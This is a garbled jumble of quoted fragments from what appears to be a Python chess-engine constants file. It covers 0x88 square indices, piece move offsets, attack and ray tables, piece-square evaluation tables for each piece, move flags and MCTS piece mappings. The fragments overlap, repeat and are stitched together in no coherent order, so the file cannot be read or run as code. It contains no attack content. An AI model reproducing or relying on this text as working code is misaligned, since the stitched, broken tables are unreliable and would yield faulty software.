0, 0,-16, 0, 0, 0, 0, 0, 0,-17 ] SHIFTS = {", "0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0,", "0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL", "24, 0, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0,", "'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7':", "0, 0,-17, 0, 0, -15, 0, 0, 0, 0, 0, 0,-16, 0, 0,", "7 RANK_2 = 6 RANK_3 = 5 RANK_4 = 4 RANK_5 = 3", "RAYS = [ 17, 0, 0, 0, 0, 0, 0, 16, 0, 0,", "16, 0, 0, 0, 0, 0, 0, 15, 0, 0, 17, 0, 0,", "-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0, 0, 15, 
0, 0, 17, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 17, 16, 15, 0, 0,", "0, 0, 0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0,", "0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0,", "83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97,", "0, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0, 0,-17 ]", "] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0],", "0,20, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24, 0, 0,", "0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0,-15,", "{ 'p': 0, 'n': 1, 'b': 2, 'r': 3, 'q': 4, 'k': 5", "0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [", "0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 0,", "1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0,", "'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2':", "[-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5,", "-1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0,", "0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5,", "= 4 RANK_5 = 3 RANK_6 = 2 RANK_7 = 1 RANK_8 =", "0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 16, 0,", "= [ 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0,", "0,20, 0, 0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0,", "0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0,", "15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", ": 4, 'q' : 5, 'k' : 6, } MCTS_DECODER = { 1", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 16,", "87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101,", "-1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL =", "BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0, -4.0,", "0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0,", "'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5':", "0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0,", "FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p',", "53, 'g5': 54, 'h5': 55, 'a4': 
64, 'b4': 65, 'c4': 66, 'd4': 67,", "24, 0, 0, 0, 0,20, 0, 0, 0, 0, 0, 0,20, 0, 0,", "0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0, 0, 0,", "0, 16, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "Directions different pieces can move PIECE_OFFSETS = { 'n': [-18, -33, -31, -14,", "'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [", "119 } ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag':", "-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0,", "1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,", "'n' : 2, 'b' : 3, 'r' : 4, 'q' : 5, 'k'", "1, 1, 1, 1, 1, 1, 0, -1, -1, -1,-1, -1, -1, -1,", "0, 0, 0, 0, 0, 17, 0, 0, 0, 16, 0, 0, 0,", "20,0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0,", "[ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5,", "0, 0,-16, 0, 0, 0, 0, 0, 0,-17 ] SHIFTS = { 'p':", "-2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0,", "BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [", "[ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0,", "0,-16, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,", "BOARD CONSTANTS ####################################################### BLACK = 'b' WHITE = 'w' EMPTY = -1 PAWN", "'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1':", ": 3, 'r' : 4, 'q' : 5, 'k' : 6, } MCTS_DECODER", "115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119 } ROOKS = {", "'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7':", "'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119 }", "'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5':", "0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0,", "17, 16, 15, -1] } MCTS_MAPPING = { 'p' : 1, 'n' :", "{ 1 : 'p', 2 : 'n', 3 : 'b', 4 : 'r',", "[ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0,", "0, 0, 0, 0, 0, 
0,20, 0, 0, 24, 0, 0,20, 0, 0,", "'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6':", "-0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0],", "'k': [-17, -16, -15, 1, 17, 16, 15, -1] } MCTS_MAPPING = {", "0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0],", "0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0,", "24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0,", "2, 24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0,-16,", "0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17,", "pawns can move: forward 1, forward 2, right (capture), left (capture) PAWN_OFFSETS =", "0, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 17, 0,", "= 5 RANK_4 = 4 RANK_5 = 3 RANK_6 = 2 RANK_7 =", "-33, -31, -14, 18, 33, 31, 14], 'b': [-17, -15, 17, 15], 'r':", "-1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0,", "0, 0, 0, 0, 16, 0, 0, 0, 0, 15, 0, 0, 0,", "= 1 RANK_8 = 0 SQUARES = { 'a8': 0, 'b8': 1, 'c8':", "0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0]", "84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98,", "64 } RANK_1 = 7 RANK_2 = 6 RANK_3 = 5 RANK_4 =", "'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2':", "0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0,", "15], 'r': [-16, 1, 16, -1], 'q': [-17, -16, -15, 1, 17, 16,", "= { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE':", "0, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0, 0,", "24, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0,", "4, 'k': 5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b',", "-5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],", "'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' }", "KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0", "-1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 
1.0,", "0,-17, 0, 0, -15, 0, 0, 0, 0, 0, 0,-16, 0, 0, 0,", "32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 = 6 RANK_3 = 5", "], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL", "0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5,", "0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 17, 0, 0,", "0, 0, 0, 17, 16, 15, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 16, 15,", "-3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0],", "'q', 6 : 'k' } MCTS_COLOR_MAP = { 'w' : 1, 'b' :", "-3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0,", "17, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 15,", "-0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4':", "0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0,", "1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5,", "0, 16, 0, 0, 0, 0, 0, 15, 0, 0, 0, 0, 17,", "17, 0, 0, 16, 0, 0, 15, 0, 0, 0, 0, 0, 0,", "0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0,", "20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20", "0,-16, 0, 0, 0, 0, 0,-17, 0, 0, -15, 0, 0, 0, 0,", "53, 2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0,", "'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL", "-1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "= [ 17, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0,", "1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5,", "1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5,", "[ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0,", "MCTS_COLOR_MAP = { 'w' : 1, 'b' : -1 } ATTACKS = [", "-4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0,", "RANK_6 = 2 RANK_7 = 1 RANK_8 = 0 SQUARES = { 'a8':", "'k': 5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE': 
'c', 'BIG_PAWN': 'b', 'EP_CAPTURE':", "4 : 'r', 5 : 'q', 6 : 'k' } MCTS_COLOR_MAP = {", "2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,53,", "-1, -1, -1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0,", "114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119 } ROOKS", "[0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0,", "'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5':", "-15, 17, 15], 'r': [-16, 1, 16, -1], 'q': [-17, -16, -15, 1,", "0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0,", "81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87,", "[ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL =", "'1/2-1/2', '*'] # Directions pawns can move: forward 1, forward 2, right (capture),", "'b' : 3, 'r' : 4, 'q' : 5, 'k' : 6, }", "5 : 'q', 6 : 'k' } MCTS_COLOR_MAP = { 'w' : 1,", "0, 0,-16, 0, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,", "SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0, -5.0,", "54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68,", "QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [", "pieces can move PIECE_OFFSETS = { 'n': [-18, -33, -31, -14, 18, 33,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 16, 15, 0,", "0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [", "0, 24, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0,", "2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ]", "1, 0, -1, -1, -1,-1, -1, -1, -1, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0,-17 ] SHIFTS = { 'p': 0, 'n':", "2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0,", "-0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0,", "{ 'n': [-18, -33, -31, -14, 18, 33, 31, 14], 'b': [-17, -15,", "'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7':", "'p' KNIGHT = 'n' BISHOP = 'b' ROOK = 'r' QUEEN = 'q'", "0, 0, 0, 0,-16, 0, 0, 0, 0, 0, 0,-17 ] SHIFTS =", "0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 24, 0,", "{ 'w': [{'square': SQUARES['a1'], 'flag': 
BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'],", "-1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0,", "0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5,", "'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3':", "} BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION':", "0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0,", "0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5,", "0, 0, 0, 0, 0, 15, 0, 0, 0, 0, 17, 0, 0,", "24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 20, 0, 0,", "'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q'", "[ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5,", "0, 0, 0, 0, 0, 0, 17, 0, 0, 16, 0, 0, 15,", "'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3':", "15, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1,", "0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],", "POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can move: forward 1,", "2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0,", "0, -1, -1, -1,-1, -1, -1, -1, 0, 0, 0, 0, 0, 0,", "0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [", "24, 0, 0, 0, 0, 0, 0,20 ] RAYS = [ 17, 0,", "'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5':", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5,", "-3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0,", "-4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0,", "'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4':", "forward 1, forward 2, right (capture), left (capture) PAWN_OFFSETS = { 'b': [16,", "0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 16, 0,", "0, 0, 0, 0, 0, 17, 0, 0, 16, 0, 0, 15, 0,", "0, 0, 17, 0, 16, 0, 15, 0, 0, 0, 0, 0, 0,", "0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [", "0, 0,20 ] RAYS = [ 
17, 0, 0, 0, 0, 0, 0,", "0, 0,-17, 0, 0, 0, 0,-15, 0, 0, 0, 0, 0,-16, 0, 0,", "1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [ [ -2.0,", "[ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5,", "49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17,", "0, 0, 0,-15, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0,-17,", "0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0, 0, 0, 0, 0,", "3 RANK_6 = 2 RANK_7 = 1 RANK_8 = 0 SQUARES = {", "0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0,", "4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18,", "0, 0, 0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0,", "-2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0", "0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0,", "-0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL =", "16, 15, -1] } MCTS_MAPPING = { 'p' : 1, 'n' : 2,", "0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20 ] RAYS =", "'d3': 83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2':", "0, 0, 0, 0, 0, 0,20, 2, 24, 2,20, 0, 0, 0, 0,", "71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85,", "0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5,", "-4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0,", "'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4':", "-2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0,", "51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65,", "[ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [", "0, 0,-15, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0,-17, 0,", "'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3':", "0, 0, 0, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2,", "-4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0,", "1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "} RANK_1 = 7 RANK_2 = 6 RANK_3 = 5 RANK_4 = 4", "0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 
1.0, 1.0, 1.0, 0.0, -1.0], [", "PAWN = 'p' KNIGHT = 'n' BISHOP = 'b' ROOK = 'r' QUEEN", "17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23,", "-4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0,", "15, 0, 0, 17, 0, 0, 0, 0, 0, 16, 0, 0, 0,", "0, 0, 0, 0,20, 2, 24, 2,20, 0, 0, 0, 0, 0, 0,", "52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66,", "'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6':", "-3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0,", "0, 24, 0, 0, 0, 0, 0,20, 0, 0, 0, 0, 20, 0,", "'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8':", "0,-17 ] SHIFTS = { 'p': 0, 'n': 1, 'b': 2, 'r': 3,", "'q': 4, 'k': 5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN':", "7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21,", "0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0,", "-3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0,", "0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0,", "-16, -15, 1, 17, 16, 15, -1], 'k': [-17, -16, -15, 1, 17,", "85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99,", "96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2': 102,", "0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0,", "0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17,", "= { 'b': [16, 32, 17, 15], 'w': [-16, -32, -17, -15] }", "0, 0, 17, 0, 0, 0, 0, 16, 0, 0, 0, 0, 15,", "'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7':", "[ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0,", "-2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0,", "1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0,", "'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7':", "can move: forward 1, forward 2, right (capture), left (capture) PAWN_OFFSETS = {", "2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [", "16, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0,", "0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0,", "66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80,", "-15, 1, 17, 16, 15, -1], 'k': [-17, -16, -15, 1, 17, 16,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 16,", "6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20,", "[ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [", "34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48,", "0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0,", "0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20 ] RAYS", "0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24, 0, 0,20, 0,", "[-17, -15, 17, 15], 'r': [-16, 1, 16, -1], 'q': [-17, -16, -15,", "'b': [16, 32, 17, 15], 'w': [-16, -32, -17, -15] } # Directions", "0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0,", "0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0,", "= 'p' KNIGHT = 'n' BISHOP = 'b' ROOK = 'r' QUEEN =", "-2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0,", "0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5,", "6 : 'k' } MCTS_COLOR_MAP = { 'w' : 1, 'b' : -1", "-1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5,", "1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0,", "0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0,", "'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4':", "['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can move: forward 1, forward 2,", "1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ 